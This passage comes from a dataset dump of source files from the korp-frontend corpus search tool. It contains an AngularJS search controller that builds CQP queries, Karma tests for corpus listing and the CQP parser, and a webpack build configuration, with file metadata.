"text": "/** @format */\nimport statemachine from \"./statemachine\"\nconst korpApp = angular.module(\"korpApp\")\n\nwindow.SearchCtrl = [\n \"$scope\",\n \"$location\",\n \"$filter\",\n \"searches\",\n function ($scope, $location, $filter, searches) {\n $scope.visibleTabs = [true, true, true, true]\n $scope.extendedTmpl = require(\"../views/extended_tmpl.pug\")\n // for parallel mode\n searches.langDef.resolve()\n $scope.isCompareSelected = false\n\n $scope.$watch(\n () => $location.search().search_tab,\n (val) => ($scope.isCompareSelected = val === 3)\n )\n\n const setupWatchWordPic = function () {\n $scope.$watch(\n () => $location.search().word_pic,\n (val) => ($scope.word_pic = Boolean(val))\n )\n\n $scope.$watch(\"word_pic\", (val) => $location.search(\"word_pic\", Boolean(val) || null))\n }\n\n const setupWatchStats = function () {\n $scope.showStatistics = true\n\n $scope.$watch(\n () => $location.search().hide_stats,\n (val) => ($scope.showStatistics = val == null)\n )\n\n $scope.$watch(\"showStatistics\", function (val) {\n if ($scope.showStatistics) {\n $location.search(\"hide_stats\", null)\n } else {\n $location.search(\"hide_stats\", true)\n }\n })\n }\n\n setupWatchWordPic()\n setupWatchStats()\n\n $scope.settings = settings\n $scope.showStats = () => settings.statistics !== false\n\n $scope.corpusChangeListener = $scope.$on(\"corpuschooserchange\", function (event, selected) {\n $scope.noCorporaSelected = !selected.length\n const allAttrs = settings.corpusListing.getStatsAttributeGroups()\n $scope.statCurrentAttrs = _.filter(allAttrs, (item) => !item.hideStatistics)\n $scope.statSelectedAttrs = ($location.search().stats_reduce || \"word\").split(\",\")\n const insensitiveAttrs = $location.search().stats_reduce_insensitive\n if (insensitiveAttrs) {\n $scope.statInsensitiveAttrs = insensitiveAttrs.split(\",\")\n }\n })\n\n $scope.$watch(\n \"statSelectedAttrs\",\n function (selected) {\n if (selected && selected.length > 0) {\n if (selected.length != 1 || !selected.includes(\"word\")) {\n $location.search(\"stats_reduce\", $scope.statSelectedAttrs.join(\",\"))\n } else {\n $location.search(\"stats_reduce\", null)\n }\n }\n },\n true\n )\n\n $scope.$watch(\n \"statInsensitiveAttrs\",\n function (insensitive) {\n if (insensitive && insensitive.length > 0) {\n $location.search(\n \"stats_reduce_insensitive\",\n $scope.statInsensitiveAttrs.join(\",\")\n )\n } else if (insensitive) {\n $location.search(\"stats_reduce_insensitive\", null)\n }\n },\n true\n )\n\n const setupHitsPerPage = function () {\n $scope.getHppFormat = function (val) {\n if (val === $scope.hitsPerPage) {\n return $filter(\"loc\")(\"hits_per_page\", $scope.lang) + \": \" + val\n } else {\n return val\n }\n }\n\n $scope.hitsPerPageValues = settings.hitsPerPageValues\n $scope.hitsPerPage = $location.search().hpp || settings.hitsPerPageDefault\n\n $scope.$watch(\n () => $location.search().hpp,\n (val) => ($scope.hitsPerPage = val || settings.hitsPerPageDefault)\n )\n\n return $scope.$watch(\"hitsPerPage\", function (val) {\n if (val === settings.hitsPerPageDefault) {\n return $location.search(\"hpp\", null)\n } else {\n return $location.search(\"hpp\", val)\n }\n })\n }\n\n const setupKwicSort = function () {\n const kwicSortValueMap = {\n \"\": \"appearance_context\",\n keyword: \"word_context\",\n left: \"left_context\",\n right: \"right_context\",\n random: \"random_context\",\n }\n $scope.kwicSortValues = _.keys(kwicSortValueMap)\n\n $scope.getSortFormat = function (val) {\n const mappedVal = 
kwicSortValueMap[val]\n if (val === $scope.kwicSort) {\n return (\n $filter(\"loc\")(\"sort_default\", $scope.lang) +\n \": \" +\n $filter(\"loc\")(mappedVal, $scope.lang)\n )\n } else {\n return $filter(\"loc\")(mappedVal, $scope.lang)\n }\n }\n\n $scope.kwicSort = $location.search().sort || \"\"\n\n $scope.$watch(\n () => $location.search().sort,\n (val) => ($scope.kwicSort = val || \"\")\n )\n\n return $scope.$watch(\"kwicSort\", function (val) {\n if (val === \"\") {\n return $location.search(\"sort\", null)\n } else {\n return $location.search(\"sort\", val)\n }\n })\n }\n\n setupHitsPerPage()\n setupKwicSort()\n },\n]\n\nkorpApp.controller(\"SearchCtrl\", window.SearchCtrl)\n\nkorpApp.controller(\"SimpleCtrl\", function (\n $scope,\n utils,\n $location,\n backend,\n $rootScope,\n searches,\n compareSearches,\n $uibModal,\n $timeout\n) {\n const s = $scope\n\n $scope.inOrder = $location.search().in_order == null\n $scope.$watch(\n () => $location.search().in_order,\n (val) => ($scope.inOrder = val == null)\n )\n\n statemachine.listen(\"lemgram_search\", (event) => {\n console.log(\"lemgram_search\", event)\n s.textInField = \"\"\n })\n\n $scope.$watch(\"inOrder\", () => $location.search(\"in_order\", !s.inOrder ? false : null))\n\n s.prefix = false\n s.mid_comp = false\n s.suffix = false\n s.isCaseInsensitive = false\n if (settings.inputCaseInsensitiveDefault) {\n s.isCaseInsensitive = true\n }\n\n s.$on(\"btn_submit\", function () {\n s.updateSearch()\n $location.search(\"within\", null)\n })\n\n // triggers watch on searches.activeSearch\n s.updateSearch = function () {\n locationSearch(\"search\", null)\n $timeout(function () {\n if (s.textInField) {\n util.searchHash(\"word\", s.textInField)\n s.model = null\n s.placeholder = null\n } else if (s.model) {\n util.searchHash(\"lemgram\", s.model)\n }\n }, 0)\n }\n\n s.$watch(\"getCQP()\", function (val) {\n if (!val) {\n return\n }\n $rootScope.simpleCQP = CQP.expandOperators(val)\n })\n\n s.getCQP = function () {\n let suffix, val\n const currentText = (s.textInField || \"\").trim()\n\n if (currentText) {\n suffix = s.isCaseInsensitive ? \" %c\" : \"\"\n const wordArray = currentText.split(\" \")\n const tokenArray = _.map(wordArray, (token) => {\n const orParts = []\n if (s.prefix) {\n orParts.push(token + \".*\")\n }\n if (s.mid_comp) {\n orParts.push(`.*${token}.*`)\n }\n if (s.suffix) {\n orParts.push(`.*${token}`)\n }\n if (!(s.prefix || s.suffix)) {\n orParts.push(regescape(token))\n }\n const res = _.map(orParts, (orPart) => `word = \"${orPart}\"${suffix}`)\n return `[${res.join(\" | \")}]`\n })\n val = tokenArray.join(\" \")\n } else if (s.placeholder || util.isLemgramId(currentText)) {\n const lemgram = s.model ? 
s.model : currentText\n val = `[lex contains \\\"${lemgram}\\\"`\n if (s.prefix) {\n val += ` | complemgram contains \\\"${lemgram}\\\\+.*\\\"`\n }\n if (s.mid_comp) {\n val += ` | complemgram contains \\\".*\\\\+${lemgram}\\\\+.*\\\"`\n }\n if (s.suffix) {\n val += ` | complemgram contains \\\".*\\\\+${lemgram}:.*\\\"`\n }\n val += \"]\"\n }\n\n if ($rootScope.globalFilter) {\n val = CQP.stringify(CQP.mergeCqpExprs(CQP.parse(val || \"[]\"), $rootScope.globalFilter))\n }\n\n return val\n }\n\n s.$on(\"popover_submit\", (event, name) => compareSearches.saveSearch(name, s.getCQP()))\n\n s.stringifyRelatedHeader = (wd) => wd.replace(/_/g, \" \")\n\n s.stringifyRelated = (wd) => util.saldoToString(wd)\n\n let modalInstance = null\n s.clickRelated = function (wd, attribute) {\n let cqp\n if (modalInstance != null) {\n modalInstance.close()\n }\n $scope.$root.searchtabs()[1].tab.select()\n if (attribute === \"saldo\") {\n cqp = `[saldo contains \\\"${regescape(wd)}\\\"]`\n } else {\n cqp = `[sense rank_contains \\\"${regescape(wd)}\\\"]`\n }\n s.$root.$broadcast(\"extended_set\", cqp)\n $location.search(\"search\", \"cqp\")\n return $location.search(\"cqp\", cqp)\n }\n\n s.relatedDefault = 3\n s.clickX = () => modalInstance.dismiss()\n\n s.showAllRelated = () =>\n (modalInstance = $uibModal.open({\n template: `\\\n <div class=\"modal-header\">\n <h3 class=\"modal-title\">{{'similar_header' | loc:lang}} (SWE-FN)</h3>\n <span ng-click=\"clickX()\" class=\"close-x\">×</span>\n </div>\n <div class=\"modal-body\">\n <div ng-repeat=\"obj in relatedObj\" class=\"col\"><a target=\"_blank\" ng-href=\"https://spraakbanken.gu.se/karp/#?mode=swefn&lexicon=swefn&search=extended||and|sense|equals|swefn--{{obj.label}}\" class=\"header\">{{stringifyRelatedHeader(obj.label)}}</a>\n <div class=\"list_wrapper\">\n <ul>\n <li ng-repeat=\"wd in obj.words\"> <a ng-click=\"clickRelated(wd, relatedObj.attribute)\" class=\"link\">{{stringifyRelated(wd) + \" \"}}</a></li>\n </ul>\n </div>\n </div>\n </div>\\\n `,\n scope: s,\n size: \"lg\",\n windowClass: \"related\",\n }))\n\n s.searches = searches\n s.$watch(\"searches.activeSearch\", function (search) {\n if (!search) {\n return\n }\n if (search.type === \"word\" || search.type === \"lemgram\") {\n if (search.type === \"word\") {\n s.textInField = search.val\n } else {\n s.placeholder = unregescape(search.val)\n s.model = search.val\n }\n s.doSearch()\n } else {\n s.placeholder = null\n if (\"lemgramResults\" in window) {\n lemgramResults.resetView()\n }\n }\n })\n\n s.doSearch = function () {\n const search = searches.activeSearch\n s.relatedObj = null\n const cqp = s.getCQP()\n searches.kwicSearch(cqp, search && search.pageOnly)\n\n if (!(search && search.pageOnly)) {\n if (search.type === \"lemgram\") {\n let sense = false\n let saldo = false\n for (let corpus of settings.corpusListing.selected) {\n if (\"sense\" in corpus.attributes) {\n sense = true\n }\n if (\"saldo\" in corpus.attributes) {\n saldo = true\n }\n }\n\n if (sense || saldo) {\n backend.relatedWordSearch(unregescape(search.val)).then(function (data) {\n s.relatedObj = data\n if (data.length > 2 && data[0].label == \"Excreting\") {\n let [first, second, ...rest] = data\n s.relatedObj.data = [second, first, ...rest]\n }\n s.relatedObj.attribute = sense ? \"sense\" : \"saldo\"\n })\n }\n }\n\n if (s.word_pic && (search.type === \"lemgram\" || !search.val.includes(\" \"))) {\n const value = search.type === \"lemgram\" ? 
unregescape(search.val) : search.val\n return searches.lemgramSearch(value, search.type)\n } else {\n if (\"lemgramResults\" in window) {\n lemgramResults.resetView()\n }\n }\n }\n }\n\n utils.setupHash(s, [\n { key: \"prefix\", default: false },\n { key: \"mid_comp\", default: false },\n { key: \"suffix\", default: false },\n { key: \"isCaseInsensitive\" },\n ])\n})\n\nkorpApp.controller(\"ExtendedSearch\", function (\n $scope,\n $location,\n $rootScope,\n searches,\n compareSearches,\n $timeout\n) {\n const s = $scope\n s.$on(\"popover_submit\", (event, name) =>\n compareSearches.saveSearch(name, $rootScope.extendedCQP)\n )\n\n s.searches = searches\n s.$on(\"btn_submit\", function () {\n $location.search(\"search\", null)\n $location.search(\"page\", null)\n $location.search(\"in_order\", null)\n $timeout(function () {\n $location.search(\"search\", \"cqp\")\n if (!_.keys(settings.defaultWithin).includes(s.within)) {\n var { within } = s\n }\n $location.search(\"within\", within)\n }, 0)\n })\n\n s.$on(\"extended_set\", ($event, val) => (s.cqp = val))\n\n if ($location.search().cqp) {\n s.cqp = $location.search().cqp\n }\n\n s.$watch(\"repeatError\", (repeatError) => (s.searchDisabled = repeatError))\n\n const updateExtendedCQP = function () {\n let val2 = CQP.expandOperators(s.cqp)\n if ($rootScope.globalFilter) {\n val2 = CQP.stringify(\n CQP.mergeCqpExprs(CQP.parse(val2 || \"[]\"), $rootScope.globalFilter)\n )\n }\n $rootScope.extendedCQP = val2\n }\n\n $rootScope.$watch(\"globalFilter\", function () {\n if ($rootScope.globalFilter) {\n updateExtendedCQP()\n }\n })\n\n s.$watch(\"cqp\", function (val) {\n if (!val) {\n return\n }\n try {\n updateExtendedCQP()\n } catch (e) {\n c.log(\"Failed to parse CQP\", val)\n c.log(\"Error\", e)\n }\n $location.search(\"cqp\", val)\n })\n\n s.withins = []\n\n s.getWithins = function () {\n const union = settings.corpusListing.getWithinKeys()\n const output = _.map(union, (item) => ({ value: item }))\n return output\n }\n\n return s.$on(\"corpuschooserchange\", function () {\n s.withins = s.getWithins()\n s.within = s.withins[0] && s.withins[0].value\n })\n})\n\nkorpApp.controller(\"ExtendedToken\", function ($scope, utils) {\n const s = $scope\n\n s.removeOr = function (token, and_array, i) {\n if (and_array.length > 1) {\n and_array.splice(i, 1)\n } else if (token.and_block.length > 1) {\n token.and_block.splice(_.indexOf(token.and_block, and_array), 1)\n }\n }\n\n s.addAnd = (token) => {\n token.and_block.push(s.addOr([]))\n }\n\n const toggleBound = function (token, bnd) {\n if (!(token.bound && token.bound[bnd])) {\n const boundObj = {}\n boundObj[bnd] = true\n token.bound = _.extend(token.bound || {}, boundObj)\n } else if (token.bound) {\n delete token.bound[bnd]\n }\n }\n\n s.toggleStart = (token) => toggleBound(token, \"lbound\")\n s.toggleEnd = (token) => toggleBound(token, \"rbound\")\n})\n\n// does nothing semantic, but useful for syntax highlighting.\nlet html = String.raw\nkorpApp.component(\"extendedOrBlock\", {\n bindings: {\n or: \"<\",\n onRemove: \"&\",\n },\n template: html`\n <div class=\"left_col\" ng-click=\"$ctrl.delete($index)\">\n <img class=\"image_button remove_arg\" src=\"${require(\"../img/minus.png\")}\" />\n </div>\n <div class=\"right_col inline_block\" style=\"margin-left: 5px;\">\n <div class=\"arg_selects {{$ctrl.or.type}}\">\n <select\n class=\"arg_type\"\n ng-options=\"obj | mapper:$ctrl.valfilter as obj.label | loc:lang group by obj.group | loc:lang for obj in $ctrl.types\"\n ng-model=\"$ctrl.currentType\"\n 
ng-change=\"$ctrl.onTypeChange()\"\n ></select>\n\n <select\n class=\"arg_opts\"\n ng-options=\"pair[1] as pair[0] | loc:lang for pair in $ctrl.getOpts($ctrl.currentTypeObj)\"\n ng-model=\"$ctrl.or.op\"\n ></select>\n </div>\n <div\n token-value=\"$ctrl.currentTypeObj\"\n model=\"$ctrl.or.val\"\n or-obj=\"$ctrl.or\"\n class=\"arg_val_container\"\n lang=\"lang\"\n ></div>\n </div>\n `,\n controller($rootScope, utils) {\n let ctrl = this\n ctrl.valfilter = utils.valfilter\n ctrl.types = []\n\n ctrl.currentType = \"\"\n ctrl.currentVal = \"\"\n\n ctrl.delete = function () {\n ctrl.onRemove()\n }\n\n ctrl.$onChanges = function () {\n ctrl.currentTypeObj = ctrl.getType(ctrl.or.type, ctrl.or.val)\n ctrl.currentType = ctrl.currentTypeObj.value\n ctrl.or.type = ctrl.currentTypeObj.cqp_prop || ctrl.currentTypeObj.value\n // ctrl.setDefault()\n }\n\n const onCorpusChange = function (event, selected) {\n // TODO: respect the setting 'wordAttributeSelector' and similar\n if (!(selected && selected.length)) {\n return\n }\n // const lang = s.$parent.$parent && s.$parent.$parent.l && s.$parent.$parent.l.lang\n const lang = $rootScope.lang\n\n const allAttrs = settings.corpusListing.getAttributeGroups(lang)\n ctrl.types = _.filter(allAttrs, (item) => !item.hideExtended)\n // s.currentType = s.getType()\n ctrl.typeMapping = _.fromPairs(\n _.map(ctrl.types, function (item) {\n if (item.isStructAttr) {\n return [`_.${item.value}`, item]\n } else {\n return [item.value, item]\n }\n })\n )\n }\n $rootScope.$on(\"corpuschooserchange\", onCorpusChange)\n\n onCorpusChange(null, settings.corpusListing.selected)\n\n ctrl.onTypeChange = function () {\n ctrl.currentTypeObj = ctrl.typeMapping[ctrl.currentType]\n ctrl.setDefault()\n }\n\n ctrl.setDefault = function () {\n // assign the first value from the opts\n\n ctrl.or.type = ctrl.currentTypeObj.cqp_prop || ctrl.currentTypeObj.value\n\n const opts = ctrl.getOpts(ctrl.currentTypeObj)\n\n if (!opts) {\n ctrl.or.op = \"=\"\n } else {\n ctrl.or.op = _.values(opts)[0][1]\n }\n\n ctrl.or.val = \"\"\n }\n\n // returning new array each time kills angular, hence the memoizing\n ctrl.getOpts = _.memoize(function (confObj) {\n // if (!(type in (s.typeMapping || {}))) {\n // return\n // }\n // let confObj = s.typeMapping && s.typeMapping[type]\n // let confObj = ctrl.getType(cqp_prop, cqp_val)\n if (!confObj) {\n c.log(\"confObj missing\", ctrl.types)\n return\n }\n\n confObj = _.extend({}, (confObj && confObj.opts) || settings.defaultOptions)\n\n if (confObj.type === \"set\") {\n confObj.is = \"contains\"\n }\n\n return _.toPairs(confObj)\n })\n\n ctrl.getType = (cqp_prop, cqp_val) => {\n // return ctrl.typeMapping[cqp_prop]\n cqp_prop = cqp_prop.replace(/^_\\./, \"\")\n let matchingTypes = ctrl.types.filter((type) => type.cqp_prop || type.value == cqp_prop)\n if (matchingTypes.length > 1) {\n return matchingTypes.find((type) => cqp_val.match(type.value_pattern))\n } else {\n return matchingTypes[0]\n }\n }\n },\n})\n\nkorpApp.directive(\"advancedSearch\", () => ({\n controller($scope, compareSearches, $location, $timeout) {\n function updateAdvancedCQP() {\n if ($location.search().search && $location.search().search.split(\"|\")) {\n var [type, ...expr] = $location.search().search.split(\"|\")\n expr = expr.join(\"|\")\n }\n\n if (type === \"cqp\") {\n $scope.cqp = expr || \"[]\"\n } else {\n $scope.cqp = \"[]\"\n }\n }\n\n // init value\n updateAdvancedCQP()\n\n // update value\n $scope.$on(\"updateAdvancedCQP\", () => {\n updateAdvancedCQP()\n })\n\n 
$scope.$on(\"popover_submit\", (event, name) => compareSearches.saveSearch(name, $scope.cqp))\n\n $scope.$on(\"btn_submit\", function () {\n $location.search(\"search\", null)\n $location.search(\"page\", null)\n $location.search(\"within\", null)\n $location.search(\"in_order\", null)\n $timeout(() => $location.search(\"search\", `cqp|${$scope.cqp}`), 0)\n })\n },\n}))\n\nkorpApp.filter(\"mapper\", () => (item, f) => f(item))\n\nkorpApp.directive(\"compareSearchCtrl\", () => ({\n controller($scope, utils, backend, $rootScope, compareSearches) {\n const s = $scope\n s.valfilter = utils.valfilter\n\n s.savedSearches = compareSearches.savedSearches\n s.$watch(\"savedSearches.length\", function () {\n s.cmp1 = compareSearches.savedSearches[0]\n s.cmp2 = compareSearches.savedSearches[1]\n if (!s.cmp1 || !s.cmp2) {\n return\n }\n\n const listing = settings.corpusListing.subsetFactory(\n _.uniq([].concat(s.cmp1.corpora, s.cmp2.corpora))\n )\n const allAttrs = listing.getAttributeGroups()\n s.currentAttrs = _.filter(allAttrs, (item) => !item.hideCompare)\n })\n\n s.reduce = \"word\"\n\n s.sendCompare = () =>\n $rootScope.compareTabs.push(backend.requestCompare(s.cmp1, s.cmp2, [s.reduce]))\n\n s.deleteCompares = () => compareSearches.flush()\n },\n}))\n\nkorpApp.filter(\"loc\", () => (translationKey, lang) => util.getLocaleString(translationKey, lang))\n"
},
{
"alpha_fraction": 0.5984117984771729,
"alphanum_fraction": 0.6006806492805481,
"avg_line_length": 27.435483932495117,
"blob_id": "1553a857235d06642730c2cbe2b02851fcdda2f0",
"content_id": "a1ed114e6d7679b9a449b71533fc01b68c1ebd8f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1763,
"license_type": "permissive",
"max_line_length": 137,
"num_lines": 62,
"path": "/test/karma/spec/corpuslisting.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/* eslint-disable\n no-undef,\n*/\nwindow.c = console\nwindow._ = require(\"lodash\")\nwindow.settings = {}\nrequire(\"configjs\")\nconst commonSettings = require(\"commonjs\")\n_.map(commonSettings, function(v, k) {\n if (k in window) {\n console.error(`warning, overwriting setting${k}`)\n}\n window[k] = v\n})\n\nrequire(\"../../../app/scripts/util.js\")\nrequire(\"defaultmode\")\n\ndescribe(\"config file\", function() {\n\n it(\"all corpora definitions have the all the required fields\", function() {\n const required_config_fields = [\n \"within\",\n \"context\",\n \"attributes\",\n \"structAttributes\",\n \"id\",\n \"title\"\n ]\n const has_all = _(settings.corpora)\n .values()\n .map(corp => _.values(_.pick(corp, required_config_fields)).length === required_config_fields.length)\n .every()\n\n expect(has_all).toBe(true)\n })\n it(\"has 'context' in all corpora definitions\", function() {\n const within = _(settings.corpora)\n .values()\n .map(item => \"within\" in item)\n .every()\n\n expect(within).toBe(true)\n })\n})\n\n\n\n\n\n\ndescribe(\"settings.corpusListing\", function() {\n const cl = settings.corpusListing\n it('has the same number of corpora as the config', () => expect(cl.corpora.length).toEqual(_.keys(settings.corpora).length))\n\n it('gives no struct attrs intersection with all corpora chosen', () => expect(_.isEmpty(cl.getStructAttrsIntersection())).toBe(true))\n\n it('gives a common attribute from vivill and gp2012', function() {\n const attrs = cl.subsetFactory([\"romi\", \"romii\"]).getStructAttrsIntersection()\n expect(\"text_title\" in attrs && \"text_author\" in attrs).toBe(true)\n })\n})\n"
},
{
"alpha_fraction": 0.4675000011920929,
"alphanum_fraction": 0.5145833492279053,
"avg_line_length": 35.3636360168457,
"blob_id": "583051d181ed086019daef4bec30cae27de8b12b",
"content_id": "3a48108ce6808517c6ebec9798ee5daca4177be4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2400,
"license_type": "permissive",
"max_line_length": 260,
"num_lines": 66,
"path": "/test/karma/spec/cqp_parser.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/* eslint-disable\n no-undef,\n*/\nrequire(\"../../../app/scripts/cqp_parser/CQPParser.js\")\nrequire(\"../../../app/scripts/cqp_parser/cqp.js\")\nwindow.moment = require(\"moment\")\n\ndescribe(\"parsing\", function() {\n it(\"can parse simple expr\", () =>\n expect(JSON.stringify(CQP.parse(\"[word = 'foo']\")))\n .toEqual('[{\"and_block\":[[{\"type\":\"word\",\"op\":\"=\",\"val\":\"foo\",\"flags\":null}]]}]')\n )\n \n it(\"can parse struct attr\", () =>\n expect(JSON.stringify(CQP.parse(\"[_.text_type = 'bar']\")))\n .toEqual('[{\"and_block\":[[{\"type\":\"_.text_type\",\"op\":\"=\",\"val\":\"bar\",\"flags\":null}]]}]')\n )\n\n\n it(\"can parse a sequence\", () =>\n expect(JSON.stringify(CQP.parse(\"[word = 'foo'] [word = 'bar']\")))\n .toEqual('[{\"and_block\":[[{\"type\":\"word\",\"op\":\"=\",\"val\":\"foo\",\"flags\":null}]]},{\"and_block\":[[{\"type\":\"word\",\"op\":\"=\",\"val\":\"bar\",\"flags\":null}]]}]')\n )\n})\n\nconst basicExpressions = [\n \"[word = \\\"foo\\\"]\",\n \"[word = \\\"foo\\\"] [word = \\\"bar\\\"] [word = \\\"what\\\"]\",\n \"[word = \\\"foo\\\"] []{1,3} [word = \\\"what\\\"]\",\n \"[(word = \\\"foo\\\" | pos = \\\"NN\\\")]\",\n \"[$date_interval = '20130610,20130617,114657,111014']\",\n \"[]\",\n \"[]{5,7}\",\n \"[pos = \\\"PM\\\" & lex contains \\\"katt..nn.1\\\"]\",\n '[word = \"\"\"\"]'\n ]\n\nconst changingExpressions = [\n { input: \"[word = \\\"foo\\\" | pos = \\\"NN\\\"]\", expected: \"[(word = \\\"foo\\\" | pos = \\\"NN\\\")]\" },\n { input: \"[word = 'foo']\", expected: \"[word = \\\"foo\\\"]\" }\n // { input: `[word = '\"']`, expected: '[word = \"\"\"\"]' }\n]\n\nconst expandExpressions = [\n {\n input: \"[$date_interval = \\\"20130610,20130617,114657,111014\\\"]\", \n expected: \"[((int(_.text_datefrom) = 20130610 & int(_.text_timefrom) >= 114657) | (int(_.text_datefrom) > 20130610 & int(_.text_datefrom) <= 20130617)) & (int(_.text_dateto) < 20130617 | (int(_.text_dateto) = 20130617 & int(_.text_timeto) <= 111014))]\"\n }\n]\n\ndescribe(\"parsing\", function() {\n it(\"can parse simple expr\", () =>\n basicExpressions.map((expr) =>\n expect(CQP.stringify(CQP.parse(expr))).toEqual(expr))\n )\n\n it(\"changes\", () =>\n changingExpressions.map((expr) =>\n expect(CQP.stringify(CQP.parse(expr.input))).toEqual(expr.expected))\n )\n\n it(\"expands\", () =>\n expandExpressions.map((expr) =>\n expect(CQP.stringify(CQP.parse(expr.input), true)).toEqual(expr.expected))\n )\n})\n"
},
{
"alpha_fraction": 0.4485122859477997,
"alphanum_fraction": 0.44878649711608887,
"avg_line_length": 27.600000381469727,
"blob_id": "67780ab95a89fa6536e3bc247343c9a9e8d0c5c5",
"content_id": "130a746f82c8cce2092e72e238176fb0156cc654",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 7293,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 255,
"path": "/webpack.common.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/** @format */\nconst webpack = require(`webpack`);\nconst path = require(`path`);\nconst { CleanWebpackPlugin } = require(`clean-webpack-plugin`);\nconst CopyWebpackPlugin = require(`copy-webpack-plugin`);\n\nfunction getKorpConfigDir() {\n const fs = require(`fs`);\n let config = `app`;\n try {\n const json = fs.readFileSync(`run_config.json`, { encoding: `utf-8` });\n config = JSON.parse(json).configDir || `app`;\n console.log(`Using \"` + config + `\" as config directory.`);\n } catch (err) {\n console.error(err);\n console.log(`No run_config.json given, using \"app\" as config directory (default).`);\n }\n return config;\n}\n\nconst korpConfigDir = getKorpConfigDir();\n\nmodule.exports = {\n resolve: {\n alias: {\n jquery: `jquery/src/jquery`,\n jreject: path.resolve(__dirname, `app/lib/jquery.reject`),\n jquerylocalize: path.resolve(__dirname, `app/lib/jquery.localize`),\n jqueryhoverintent: path.resolve(__dirname, `app/lib/jquery.hoverIntent`),\n configjs: path.resolve(korpConfigDir, `config.js`),\n commonjs: path.resolve(korpConfigDir, `modes/common.js`),\n defaultmode: path.resolve(korpConfigDir, `modes/default_mode.js`),\n customcss: path.resolve(korpConfigDir, `styles/`),\n customscripts: path.resolve(korpConfigDir, `scripts/`),\n customviews: path.resolve(korpConfigDir, `views/`),\n },\n },\n module: {\n rules: [\n {\n test: /\\.js$/,\n exclude: /(node_modules|bower_components)/,\n use: {\n loader: `babel-loader`,\n options: {\n presets: [`@babel/preset-env`],\n },\n },\n },\n {\n test: /\\.tsx?$/,\n use: {\n loader: `ts-loader`,\n options: {\n configFile: path.resolve(__dirname, `tsconfig.json`),\n },\n },\n exclude: /node_modules/,\n },\n {\n test: require.resolve(\n path.resolve(__dirname, `app/scripts/cqp_parser/CQPParser.js`)\n ),\n use: `imports-loader?this=>window`,\n },\n {\n test: /\\.pug$/i,\n exclude: [\n // does not work\n path.resolve(__dirname, `app/index.pug`),\n ],\n use: [\n { loader: `file-loader` },\n {\n loader: `extract-loader`,\n options: { publicPath: `` },\n },\n { loader: `html-loader` },\n { loader: `pug-html-loader` },\n ],\n },\n {\n test: /index.pug$/,\n use: [\n { loader: `file-loader?name=index.html` },\n {\n loader: `extract-loader`,\n options: { publicPath: `` },\n },\n {\n loader: `html-loader`,\n options: {\n attrs: [`img:src`, `link:href`],\n },\n },\n {\n loader: `pug-html-loader`,\n options: {\n // TODO we should not pretty-print HTML, but removing this\n // option will result in that some elements get closer together\n // and need to be fixed with CSS\n pretty: true,\n },\n },\n ],\n },\n {\n test: /\\.html$/,\n exclude: [path.resolve(korpConfigDir, `./views/`)],\n use: [\n { loader: `file-loader` },\n {\n loader: `extract-loader`,\n options: { publicPath: `` },\n },\n { loader: `html-loader` },\n ],\n },\n {\n test: /\\.html$/,\n include: [path.resolve(korpConfigDir, `./views/`)],\n use: [\n {\n loader: `html-loader`,\n options: {\n minimize: true,\n conservativeCollapse: false,\n },\n },\n ],\n },\n {\n test: /\\.(jpe?g|png|gif|svg)$/i,\n loader: `file-loader?name=[name].[contenthash].[ext]`,\n },\n {\n test: /\\.ico$/i,\n loader: `file-loader?name=[name].[ext]`,\n },\n {\n test: /\\.otf$/i,\n loader: `file-loader`,\n },\n {\n test: /\\.woff(\\?v=\\d+\\.\\d+\\.\\d+)?$/,\n loader: `file-loader?mimetype=application/font-woff`,\n },\n {\n test: /\\.woff2(\\?v=\\d+\\.\\d+\\.\\d+)?$/,\n loader: `file-loader?mimetype=application/font-woff`,\n },\n {\n test: /\\.ttf(\\?v=\\d+\\.\\d+\\.\\d+)?$/,\n loader: 
`file-loader?mimetype=application/octet-stream`,\n },\n {\n test: /\\.eot(\\?v=\\d+\\.\\d+\\.\\d+)?$/,\n loader: `file-loader`,\n },\n {\n test: /\\.css$/,\n use: [{ loader: `style-loader` }, { loader: `css-loader` }],\n },\n {\n test: /\\.scss$/,\n use: [\n `style-loader`, // creates style nodes from JS strings\n {\n loader: `css-loader`,\n options: {\n sourceMap: process.env.NODE_ENV !== `production`,\n },\n },\n {\n loader: `postcss-loader`,\n options: {\n // plugins: () => [require(\"tailwindcss\"), require(\"autoprefixer\")],\n // sourceMap: process.env.NODE_ENV !== \"production\",\n },\n },\n {\n loader: `sass-loader`,\n options: {\n sourceMap: process.env.NODE_ENV !== `production`,\n // sourceMapContents: false\n },\n },\n ],\n },\n ],\n },\n plugins: [\n new CleanWebpackPlugin(),\n new webpack.ProvidePlugin({\n $: `jquery`,\n jQuery: `jquery`,\n }),\n new webpack.IgnorePlugin(/^\\.\\/locale$/, /moment$/),\n new CopyWebpackPlugin({\n patterns: [\n {\n from: korpConfigDir + `/modes/*mode.js`,\n to: `modes`,\n flatten: true,\n },\n {\n from: korpConfigDir + `/modes/*html`,\n to: `modes`,\n flatten: true,\n },\n {\n from: `app/translations/angular-locale_*.js`,\n to: `translations`,\n flatten: true,\n },\n {\n from: `app/markup/msdtags.html`,\n to: `markup`,\n },\n {\n from: `app/translations/locale-*.json`,\n to: `translations`,\n flatten: true,\n },\n {\n from: korpConfigDir + `/translations/*`,\n to: `translations`,\n flatten: true,\n },\n {\n from: `app/lib/deptrees/`,\n to: `lib/deptrees`,\n },\n /* TODO: probably remove this? cannot find any json files there.\n {\n from: \"node_modules/geokorp/dist/data/*.json\",\n // TODO hard-coded in geokorp project that these files should be here\n // we need to change geokorp so that these files are required\n to: \"components/geokorp/dist/data\",\n flatten: true\n }\n */\n ],\n }),\n ],\n entry: {\n bundle: `./app/index.js`,\n worker: `./app/scripts/statistics_worker.ts`,\n },\n output: {\n filename: `[name].js`,\n path: path.resolve(__dirname, `dist`),\n globalObject: `this`,\n },\n};\n"
},
{
"alpha_fraction": 0.4790255129337311,
"alphanum_fraction": 0.4819086194038391,
